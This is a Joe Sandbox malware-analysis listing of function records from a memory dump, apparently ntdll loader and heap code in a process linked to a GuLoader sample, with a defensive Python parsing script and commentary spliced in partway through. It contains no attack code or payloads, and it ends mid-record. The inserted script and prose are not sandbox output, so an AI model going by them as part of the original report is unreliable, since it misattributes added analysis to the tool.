                                                • Instruction ID: 5651a76e66970eaa80e2ac470e3ac713c30c823d01aa72b0eb09bea74c8ed70a
                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                • Instruction Fuzzy Hash: F581F678E2D3598EEF04CF69C8517EEBBB1AF45354F544219D850AB3D1C7748842CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $$@
                                                • API String ID: 3446177414-1194432280
                                                • Opcode ID: ffd55a372519feb2b4d3b72622984cb5183e4670c5ce03d26fc0b07a376dd276
                                                • Instruction ID: c75556627f23c424d4a3bbad9435189cffb1844e6aa351cc9159292b0563d65e
                                                • Opcode Fuzzy Hash: ffd55a372519feb2b4d3b72622984cb5183e4670c5ce03d26fc0b07a376dd276
                                                • Instruction Fuzzy Hash: C0816E75D002699BDB21CF55CC44BEEB7B8AF08754F5041EAE909B7290E7309E84CFA5
                                                APIs
                                                Strings
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 36DD3640, 36DD366C
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 36DD365C
                                                • LdrpFindDllActivationContext, xrefs: 36DD3636, 36DD3662
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 36DD362F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 3446177414-3779518884
                                                • Opcode ID: 17a99cba0e720d281b3e41076a4ecc1bdd4bd7f73c13746aa94dc732e6f6bd9f
                                                • Instruction ID: b82a430dca5f689c4331cb66c4a3e73600db2c01525d738d31a29c5111d998c9
                                                • Opcode Fuzzy Hash: 17a99cba0e720d281b3e41076a4ecc1bdd4bd7f73c13746aa94dc732e6f6bd9f
                                                • Instruction Fuzzy Hash: 4D3159BED01312EAFB11AB45C848BD677F4AB81394F438166E60463753EBA0DC84CAF5
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 36DCA992
                                                • apphelp.dll, xrefs: 36D82462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DCA9A2
                                                • LdrpDynamicShimModule, xrefs: 36DCA998
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 991d8b3b2e972b85c94ca5f3a37f0345c4c6165684db4c961857cb8231589eec
                                                • Instruction ID: 78d34d375e714f7d53659de5d9369fbabb6a2f532ea5a7a005ed7f794db3fe12
                                                • Opcode Fuzzy Hash: 991d8b3b2e972b85c94ca5f3a37f0345c4c6165684db4c961857cb8231589eec
                                                • Instruction Fuzzy Hash: CA316B76A00305EBE7199F69CC45E5ABBB6FBC4744F660059EB00B7250DBB0D88ACB91
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$[$]:%u
                                                • API String ID: 48624451-2819853543
                                                • Opcode ID: 895cc4ae208917c2ee65033c47e8e32c1195a869b683ee09b9171da33b0892d8
                                                • Instruction ID: 729143e1938d2b25b450ad3a463126948a9786f027135d4802a3848f83ea9b1a
                                                • Opcode Fuzzy Hash: 895cc4ae208917c2ee65033c47e8e32c1195a869b683ee09b9171da33b0892d8
                                                • Instruction Fuzzy Hash: 7E2162B6E00219AFDB00DF79DC40AEEBBF9EF54684F450116E905E3200E731DA49DBA5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 3446177414-3610490719
                                                • Opcode ID: 77d31c5e738ef3f06a222bbf93d0c60ea690ff597574b77924752b29fc8cd127
                                                • Instruction ID: abedea26055e1e913540baa6d51bb7342c55e52e757b90715e03842c7dd447d0
                                                • Opcode Fuzzy Hash: 77d31c5e738ef3f06a222bbf93d0c60ea690ff597574b77924752b29fc8cd127
                                                • Instruction Fuzzy Hash: 03910475A14B50DFEB15DF25C880F1AB7A5AF84684F020459EA419FA81DB34E845CFE3
                                                APIs
                                                Strings
                                                • LdrpCheckModule, xrefs: 36DCA117
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DCA121
                                                • Failed to allocated memory for shimmed module list, xrefs: 36DCA10F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-161242083
                                                • Opcode ID: 98d448cc76b840b0a6fafd8aa88faf8d8d40d10e2a021ba5dd19ea593f65ec40
                                                • Instruction ID: b5fd1d7152007983f89cfbda06f870c287ad6e4f3bc4a6719175261e60e72e0b
                                                • Opcode Fuzzy Hash: 98d448cc76b840b0a6fafd8aa88faf8d8d40d10e2a021ba5dd19ea593f65ec40
                                                • Instruction Fuzzy Hash: 1B71EF75E00309DFEB08CF68C984AAEB7F5EB44304F144469DA01E7251E774ED86CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
• Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: $File
                                                • API String ID: 3446177414-2412145507
                                                • Opcode ID: 19ba4f39f644700f0a5cd623e04644e7b5aad143261551f1cd0c68e7dbf81427
                                                • Instruction ID: 287119fd4f9f681f8f056b9eebff701d0649123cb660c7412729c3287e52d13c
                                                • Opcode Fuzzy Hash: 19ba4f39f644700f0a5cd623e04644e7b5aad143261551f1cd0c68e7dbf81427
                                                • Instruction Fuzzy Hash: 2C619071A1532CABDB26CF25CC41BEA77B9AB48700F5442E9E509E6181DB709F88CF64
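The function records above all come from the same PE-backed dump region (process index 4, offset 36D30000), and the strings they carry (LdrpInitShimEngine, LdrpLoadShimEngine, minkernel\ntdll\ldrinit.c, HEAP[%wZ]) are ntdll loader and heap internals rather than anything belonging to the sample. The Python script below is an added example, not part of the Joe Sandbox report and not code from the GuLoader sample: it parses records in this listing format and summarises, per dump region, how many functions reference ntdll source paths, which is the first thing to check when deciding whether a PE-backed region that is not the main image is a second mapping of ntdll. The sample input is a constructed three-record excerpt with values copied from the listing; the assumption that the leading field of the .sdmp name is Joe's per-analysis process index, and the helper names, are mine.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Constructed excerpt (three records) in the format of the listing above; the
# values are copied from it, the Associated/Snapshot lines are left out.
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
Similarity
• API ID: DebugPrintTimes
• String ID: LdrpInitShimEngine$apphelp.dll$minkernel\\ntdll\\ldrinit.c
• API String ID: 3446177414-204845295
• Instruction Fuzzy Hash: 9E51A071A08384AFEB15DF20C841E5B7BE5AF85644F410919F686AB1A4DB30D908CFA3
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
Similarity
• API ID: DebugPrintTimes
• String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\\ntdll\\ldrdload.c
• API String ID: 3446177414-4227709934
• Instruction Fuzzy Hash: 6B417CB9E01249ABDB01EF9AC990ADEBBB5FF88344F100119EA04AB341D731DD15CBA0
Memory Dump Source
• Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Instruction Fuzzy Hash: F581F678E2D3598EEF04CF69C8517EEBBB1AF45354F544219D850AB3D1C7748842CBA1
"""

SOURCE_RE = re.compile(r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
NTDLL_SOURCE_RE = re.compile(r"minkernel\\ntdll\\[\w.]+")  # source paths in ntdll debug strings


@dataclass
class FunctionRecord:
    process_index: int = -1  # leading field of the .sdmp name; assumed to be Joe's process index
    offset: int = 0
    based_on_pe: bool = False
    api_id: str = ""
    strings: List[str] = field(default_factory=list)
    instruction_fuzzy_hash: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per function; the Instruction Fuzzy Hash line closes a record."""
    records: List[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line.startswith("Source File:"):
            m = SOURCE_RE.search(line)
            if m:
                cur.process_index = int(m.group(1).split(".")[0])
                cur.offset = int(m.group(2), 16)
                cur.based_on_pe = m.group(3) == "true"
        elif line.startswith("API ID:"):
            cur.api_id = line[len("API ID:"):].strip()
        elif line.startswith("String ID:"):
            # Joe joins strings with '$'; a literal '$' is not recoverable, so
            # empty fragments (as in '$$Failed...') are dropped, not guessed at.
            body = line[len("String ID:"):].strip()
            cur.strings = [s for s in body.split("$") if s.strip()]
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
    return records


def ntdll_source_paths(rec: FunctionRecord) -> List[str]:
    """minkernel\\ntdll\\... paths referenced by one function's strings."""
    return sorted({NTDLL_SOURCE_RE.search(s).group(0) for s in rec.strings if NTDLL_SOURCE_RE.search(s)})


def summarize(records: List[FunctionRecord]) -> Dict[str, dict]:
    """Per dump region: function count, how many carry ntdll source paths, and which."""
    summary: Dict[str, dict] = {}
    for rec in records:
        key = f"{rec.process_index}:{rec.offset:08X}"
        entry = summary.setdefault(key, {"functions": 0, "pe_backed": rec.based_on_pe,
                                         "loader_internal": 0, "ntdll_sources": set(), "api_ids": set()})
        entry["functions"] += 1
        paths = ntdll_source_paths(rec)
        if paths:
            entry["loader_internal"] += 1
            entry["ntdll_sources"].update(paths)
        if rec.api_id:
            entry["api_ids"].add(rec.api_id)
    return summary


if __name__ == "__main__":
    for region, e in summarize(parse_records(SAMPLE_REPORT)).items():
        print(f"{region}: {e['functions']} functions, PE-backed={e['pe_backed']}, "
              f"{e['loader_internal']} reference ntdll sources {sorted(e['ntdll_sources'])}")
```

Run against the full listing, the script groups every record by region; a region whose strings resolve to minkernel\ntdll\ paths and whose base does not match the ntdll loaded at process start is worth comparing byte-for-byte against the on-disk ntdll.dll before drawing any conclusion about why it is there.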
                                                APIs
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 36DD82D7
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 36DD82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 36DD82E8
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 3446177414-1783798831
                                                • Opcode ID: c0fb5889d8ef1bc22ba6362ddfc323734a0835d5ebbe71dfb904d469522f17d8
                                                • Instruction ID: 20adb8054b8d1caaad0aa24604a3cd6d986f1486cc7094d5e5f7b9f39d4f8d3e
                                                • Opcode Fuzzy Hash: c0fb5889d8ef1bc22ba6362ddfc323734a0835d5ebbe71dfb904d469522f17d8
                                                • Instruction Fuzzy Hash: E34102B5911340EBD711DB64DC44B8B7BE9EF46650F10492AFA48E72A0EB74D809CBA2
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 36DD7BAC
                                                • RTL: Resource at %p, xrefs: 36DD7B8E
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 36DD7B7F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: dd8ca4ea8f97d53f49a3cda4ebf3862f1fbcaeab6f01ae33de5caf39120c1d1e
                                                • Instruction ID: 53b70771bbc8611b2fefddec87ef1d6fc17f2969304249c0984621cc6b9aed19
                                                • Opcode Fuzzy Hash: dd8ca4ea8f97d53f49a3cda4ebf3862f1fbcaeab6f01ae33de5caf39120c1d1e
                                                • Instruction Fuzzy Hash: 4A419B39B057029FE720DF25CC40B9BB7E5EF88754F110A5DE99A9B680DB22E8058B91
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 36DD728C
                                                Strings
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 36DD7294
                                                • RTL: Re-Waiting, xrefs: 36DD72C1
                                                • RTL: Resource at %p, xrefs: 36DD72A3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: dcf1987831066715507b3696b21e3dc72304c7ba5f4a1a85e27d19046c0c10f3
                                                • Instruction ID: 7145156f5cd792ceab2e90a781434758a95fa0d12a25897daf757014fbe21786
                                                • Opcode Fuzzy Hash: dcf1987831066715507b3696b21e3dc72304c7ba5f4a1a85e27d19046c0c10f3
                                                • Instruction Fuzzy Hash: 7A41EF35A00352ABE720DF25CC41B96BBB5FF88758F110659F994AB240DB21E816CBE1
                                                APIs
                                                Strings
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 36DE4888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 36DE4899
                                                • LdrpCheckRedirection, xrefs: 36DE488F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 3446177414-3154609507
                                                • Opcode ID: 30ef4ec30103fb278594f504e17e1dd5abd01e22358bf6d7c9204e725bf299ba
                                                • Instruction ID: 974c7d2bb769a1b9e31b44d170fc1d7d9fadf04ca9aa3fb700cdfae7961a9a73
                                                • Opcode Fuzzy Hash: 30ef4ec30103fb278594f504e17e1dd5abd01e22358bf6d7c9204e725bf299ba
                                                • Instruction Fuzzy Hash: BB41DE76E017609BDB11DF29C880A167BE5AF89790F120669ED98EB351D730EC04CBE1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 275f5cef6d6b00086ceacc0e90dda2325ec51c12f1a841ecc7c95f00e3e5c789
                                                • Instruction ID: 71770bb9ddb33cb7f1e71eb6a88d25436c2bb2a3783d0cc6d5b560ef6d147165
                                                • Opcode Fuzzy Hash: 275f5cef6d6b00086ceacc0e90dda2325ec51c12f1a841ecc7c95f00e3e5c789
                                                • Instruction Fuzzy Hash: 56318476A00219AFDB10CF29CC44BEEB7F8EB54654F810555E849E3200EB30EA499BB5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: Wow64 Emulation Layer
                                                • API String ID: 3446177414-921169906
                                                • Opcode ID: fac4b9363f29b5d679f022c9b6a7fed4ab2c20b96692298fa695b0910ef08ecb
                                                • Instruction ID: ee8efd12e1e3f19249f03fe971c75b762b4069e616fe9fd79bffdbc3b3f34cd1
                                                • Opcode Fuzzy Hash: fac4b9363f29b5d679f022c9b6a7fed4ab2c20b96692298fa695b0910ef08ecb
                                                • Instruction Fuzzy Hash: 8021367690115DBFAB019AA1CD84CAFBF7DEF452D8B110064FA05A2100E734DE09DB35
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: ec9836a42a73315214db0f800fb1fc198b9ef9b9c81193cf1ade4153bff2ab63
                                                • Instruction ID: 30d1ad3129c9d2afde1086720baf364a644ed925bbffc5458521b798abf1e051
                                                • Opcode Fuzzy Hash: ec9836a42a73315214db0f800fb1fc198b9ef9b9c81193cf1ade4153bff2ab63
                                                • Instruction Fuzzy Hash: AFE16071E01309AFEF05CFA5C884BEEBBB5AF48354F64412AE515EB280E7709A49CF54
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 038444276bfdb296428bba77404f7de164fa003046c7d60b543e607e8f1e82a9
                                                • Instruction ID: 177e91524d06e89e2bbcf3072fe88833e641a79ced60a8f06b74de2bc8e14055
                                                • Opcode Fuzzy Hash: 038444276bfdb296428bba77404f7de164fa003046c7d60b543e607e8f1e82a9
                                                • Instruction Fuzzy Hash: BAE112B5D00718DFEB25CFAAC988A9DBBF1FF48394F20452AE545AB260D730A845CF51
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 1918699c9133aed2c57cb98ec5e1b2ccfd45f34b78ed38ebd27775ba15582b34
                                                • Instruction ID: 09e0839b99a0b6cff61a148b045e5cdba71d9bc9fbe967c90e984c277e27556f
                                                • Opcode Fuzzy Hash: 1918699c9133aed2c57cb98ec5e1b2ccfd45f34b78ed38ebd27775ba15582b34
                                                • Instruction Fuzzy Hash: 247146B1E00229EFDF04EFA5D990ADDBBB5BF48354F14402AE905FB254D734A906CBA4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: 5a1220aadc3091b6fd02b6955cc31f7149e86b869cd4ee04d0d65d078bd89147
                                                • Instruction ID: 3fa9d03e0da8fc517479cc2d6ee0eba1e75a67001ae3bbc6a9b88f642509d6c8
                                                • Opcode Fuzzy Hash: 5a1220aadc3091b6fd02b6955cc31f7149e86b869cd4ee04d0d65d078bd89147
                                                • Instruction Fuzzy Hash: 21517C74B12622AFEB08CE5DC594A1977F2BF89358B20406DD906DB750DBB0EC89CB80
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID:
                                                • API String ID: 3446177414-0
                                                • Opcode ID: de0a6bc659242fa5f5eed8d31ce1bea06c261cb0f04c4958a1df9ae39390c740
                                                • Instruction ID: c963014b70e4c40c482a9e64ac19de9afdadc8431d065d7f83ff067735d43499
                                                • Opcode Fuzzy Hash: de0a6bc659242fa5f5eed8d31ce1bea06c261cb0f04c4958a1df9ae39390c740
                                                • Instruction Fuzzy Hash: 1D5155B6E00219EFEF08DFA9C851ACCBBB2BF48354F15812AE905BB250D7349905CF64
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2791404664.0000000036D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D30000, based on PE: true
                                                • Associated: 00000004.00000002.2791404664.0000000036E59000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036E5D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000004.00000002.2791404664.0000000036ECE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_36d30000_3507071243740008011.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                • String ID:
                                                • API String ID: 4281723722-0
                                                • Opcode ID: fc528aed4783bade6eb938a378ecb8e4e2dc3f97fd9614eaeb347b6222dbe521
